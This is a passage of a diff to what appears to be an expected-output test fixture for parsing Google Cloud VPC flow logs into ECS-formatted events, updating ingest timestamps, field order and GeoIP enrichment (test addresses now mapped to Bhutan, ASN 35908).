on\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", @@ -18626,6 +19508,18 @@ "id": "19im82tfdygzns", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", + "bytes": 74370, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 580, + "direction": "outbound" } }, { @@ -18640,11 +19534,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -18716,7 +19615,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392210600Z", + "ingested": "2021-12-14T14:43:27.415271703Z", "original": "{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -18814,7 +19713,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392216100Z", + "ingested": "2021-12-14T14:43:27.415272099Z", "original": "{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", @@ -18825,41 +19724,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "192.168.2.117", - "port": 51348, - "ip": "192.168.2.117" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18870,6 +19734,9 @@ "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -18890,21 +19757,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392221900Z", - "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:20.630975303Z", - "end": "2019-06-14T03:41:20.754300982Z", - "id": "19im82tfdygzo3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", @@ -18913,15 +19765,67 @@ "as": { "number": 15169 }, - "address": "67.43.156.13", - "port": 33560, - "domain": "kibana", - "ip": "67.43.156.13" + "address": "192.168.2.117", + "port": 51348, + "ip": "192.168.2.117" }, "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 152218, + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "event": { + "ingested": "2021-12-14T14:43:27.415272514Z", + "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:20.630975303Z", + "end": "2019-06-14T03:41:20.754300982Z", + "id": "19im82tfdygzo3", + "category": "network", + "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33560, + "domain": "kibana", + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 152218, "packets": 243, "domain": "elasticsearch", "ip": "10.139.99.242" @@ -18989,7 +19893,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392232200Z", + "ingested": "2021-12-14T14:43:27.415273336Z", "original": "{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", @@ -19005,11 +19909,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33510, @@ -19087,7 +19996,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392238Z", + "ingested": "2021-12-14T14:43:27.415273820Z", "original": "{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", @@ -19109,11 +20018,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33510, @@ -19185,7 +20099,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392243800Z", + "ingested": "2021-12-14T14:43:27.415274217Z", "original": "{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", @@ -19207,11 +20121,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33532, @@ -19283,7 +20202,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392247100Z", + "ingested": "2021-12-14T14:43:27.415274659Z", "original": "{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", @@ -19294,43 +20213,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41822, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.139.99.242", - "port": 22, - "bytes": 0, - "packets": 4, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 4, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -19341,6 +20223,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -19361,8 +20246,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41822, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.139.99.242", + "port": 22, + "bytes": 0, + "packets": 4, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392251600Z", + "ingested": "2021-12-14T14:43:27.415275149Z", "original": "{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", @@ -19370,6 +20280,18 @@ "id": "19im82tfdygzo6", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 4, + "direction": "outbound" } }, { @@ -19378,11 +20300,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33532, @@ -19460,7 +20387,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392257300Z", + "ingested": "2021-12-14T14:43:27.415275634Z", "original": "{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", @@ -19476,11 +20403,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33568, @@ -19558,7 +20490,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392262900Z", + "ingested": "2021-12-14T14:43:27.415276075Z", "original": "{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", @@ -19574,11 +20506,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -19656,7 +20593,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392266800Z", + "ingested": "2021-12-14T14:43:27.415276467Z", "original": "{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", @@ -19672,11 +20609,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -19754,7 +20696,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392271300Z", + "ingested": "2021-12-14T14:43:27.415276867Z", "original": "{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", @@ -19770,11 +20712,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53106, @@ -19852,7 +20799,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392276900Z", + "ingested": "2021-12-14T14:43:27.415277261Z", "original": 